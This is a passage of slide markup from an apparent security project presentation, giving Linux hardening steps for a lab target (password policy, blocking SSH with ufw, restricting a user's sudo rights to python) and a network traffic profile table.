            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>   chage -d 0 &lt;user_name&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="228600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>   nano /etc/security/pwquality.conf</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="228600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>   Add option ‘minlen = 16’</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="228600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>   Add option ‘minclass = 4’</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="228600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="500"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr i="1" sz="2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Hardening Against Improper Access Control on Target 1</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="326" name="Google Shape;326;p27"/>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27" name="Google Shape;327;p27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="353275" y="1147700"/>
            <a:ext cx="11471400" cy="493335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SzPts val="3700"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Block all incoming SSH connections</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-114300" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Implicit denial is the best practice for remote connections.</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-114300" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>RUN:</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="228600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="500"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>   ufw deny ssh</a:t>
            </a:r>
            <a:endParaRPr sz="2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Hardening Against Improper Permissions on Target 1</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="333" name="Google Shape;333;p28"/>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34" name="Google Shape;334;p28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="353275" y="1147700"/>
            <a:ext cx="11471400" cy="493335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Clr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Restrict user ‘steven’ from running python scripts by editing the sudoers configuration file.</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-114300" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Preventing non root users from running python scripts, will make it more difficult for potential attackers accomplish privilege escalation.</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-114300" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>RUN:</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="228600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>   visudo</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="228600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="500"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>   remove ‘/usr/bin/python’ from user ‘steven’.</a:t>
            </a:r>
            <a:endParaRPr sz="2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9"/>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340" name="Google Shape;340;p29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="367228" y="2855725"/>
            <a:ext cx="11457450" cy="118485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Font typeface="Roboto"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Implementing Patches</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buSzPts val="4800"/>
              <a:buFont typeface="Roboto"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buSzPts val="4800"/>
              <a:buFont typeface="Roboto"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="341" name="Google Shape;341;p29"/>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
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="367255" y="386534"/>
            <a:ext cx="11457412" cy="6123224"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="141" name="Google Shape;141;p3"/>
          <p:cNvSpPr txBox="1"/>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142" name="Google Shape;142;p3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="367259" y="2468134"/>
            <a:ext cx="11457450" cy="13728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None/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Network Topology</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp; Critical Vulnerabilities</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="9600"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="143" name="Google Shape;143;p3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-42123" y="17481422"/>
            <a:ext cx="28329749" cy="806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Ansible Playbook</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="348" name="Google Shape;348;p30"/>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49" name="Google Shape;349;p30"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-14808" y="6555534"/>
            <a:ext cx="10626450" cy="302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pic>
        <p:nvPicPr>
          <p:cNvPr id="350" name="Google Shape;350;p30"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1088313" y="1321887"/>
            <a:ext cx="10015376" cy="462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365779" y="2900771"/>
            <a:ext cx="11460400" cy="10564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FFFFFF"/>
              </a:buClr>
              <a:buSzPts val="4800"/>
              <a:buFont typeface="Roboto"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Traffic Profile</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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="356" name="Google Shape;356;p31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11477033" y="6609600"/>
            <a:ext cx="349200" cy="140800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="121900"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title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-6152" y="0"/>
            <a:ext cx="4585600" cy="2668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solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Traffic Profile</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="362" name="Google Shape;362;p32"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4305008" y="2478600"/>
            <a:ext cx="130800" cy="52800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="12190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63" name="Google Shape;363;p32"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="358796" y="1015967"/>
            <a:ext cx="11474400" cy="4933200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="1219200" lIns="609600" spcFirstLastPara="1" rIns="609600" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="667"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2267"/>
              <a:t>Our analysis identified the following characteristics of the traffic on the network: </a:t>
            </a:r>
            <a:endParaRPr sz="2267">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="364" name="Google Shape;364;p32"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="978451" y="1434604"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{98A56654-EA91-4F55-90DB-6ADEFF4DA2A4}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="3411700"/>
                <a:gridCol w="3411700"/>
                <a:gridCol w="3411700"/>
              </a:tblGrid>
              <a:tr h="496600">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:srgbClr val="FFFFFF"/>
                        </a:buClr>
                        <a:buSzPts val="2300"/>
                        <a:buFont typeface="Roboto"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en-US" sz="2300" u="none" cap="none" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Feature</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="2300" u="none" cap="none" strike="noStrike">
                        <a:solidFill>
                          <a:srgbClr val="FFFFFF"/>
                        </a:solidFill>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spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:srgbClr val="FFFFFF"/>
                        </a:buClr>
                        <a:buSzPts val="2300"/>
                        <a:buFont typeface="Roboto"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en-US" sz="2300" u="none" cap="none" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Value</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="2300" u="none" cap="none" strike="noStrike">
                        <a:solidFill>
                          <a:srgbClr val="FFFFFF"/>
                        </a:solidFill>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spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:srgbClr val="FFFFFF"/>
                        </a:buClr>
                        <a:buSzPts val="2300"/>
                        <a:buFont typeface="Roboto"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en-US" sz="2300" u="none" cap="none" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Description</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="2300" u="none" cap="none" strike="noStrike">
                        <a:solidFill>
                          <a:srgbClr val="FFFFFF"/>
                        </a:solidFill>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1310600">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:schemeClr val="dk1"/>
                        </a:buClr>
                        <a:buSzPts val="2000"/>
                        <a:buFont typeface="Roboto"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" u="none" cap="none" strike="noStrike">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Top Talkers (IP Addresses)</a:t>
                      </a:r>
                      <a:endParaRPr sz="20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solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>172.16.4.205</a:t>
                      </a:r>
                      <a:endParaRPr sz="2000" u="none" cap="none" strike="noStrike">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:schemeClr val="dk1"/>
                        </a:buClr>
                        <a:buSzPts val="2000"/>
                        <a:buFont typeface="Calibri"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" u="none" cap="none" strike="noStrike">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>10.6.12.203</a:t>
                      </a:r>
                      <a:endParaRPr sz="2000" u="none" cap="none" strike="noStrike">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:schemeClr val="dk1"/>
                        </a:buClr>
                        <a:buSzPts val="2000"/>
                        <a:buFont typeface="Calibri"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" u="none" cap="none" strike="noStrike">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>10.0.0.201</a:t>
                      </a:r>
                      <a:endParaRPr sz="2000" u="none" cap="none" strike="noStrike">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:schemeClr val="dk1"/>
                        </a:buClr>
                        <a:buSzPts val="2000"/>
                        <a:buFont typeface="Calibri"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:t/>
                      </a:r>
                      <a:endParaRPr sz="2000" u="none" cap="none" strike="noStrike"/>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700"/>
                        <a:buFont typeface="Roboto"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1700" u="none" cap="none" strike="noStrike">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Machines that sent the most traffic.</a:t>
                      </a:r>
                      <a:endParaRPr sz="17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897475">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:schemeClr val="dk1"/>
                        </a:buClr>
                        <a:buSzPts val="2000"/>
                        <a:buFont typeface="Roboto"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" u="none" cap="none" strike="noStrike">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Most Common Protocols</a:t>
                      </a:r>
                      <a:endParaRPr sz="20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HTTP, NetBIOS, DNS</a:t>
                      </a:r>
                      <a:endParaRPr sz="2000" u="none" cap="none" strike="noStrike"/>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700"/>
                        <a:buFont typeface="Roboto"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1700" u="none" cap="none" strike="noStrike">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Three most common protocols on the network.</a:t>
                      </a:r>
                      <a:endParaRPr sz="17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541125">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:schemeClr val="dk1"/>
                        </a:buClr>
                        <a:buSzPts val="2000"/>
                        <a:buFont typeface="Roboto"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" u="none" cap="none" strike="noStrike">
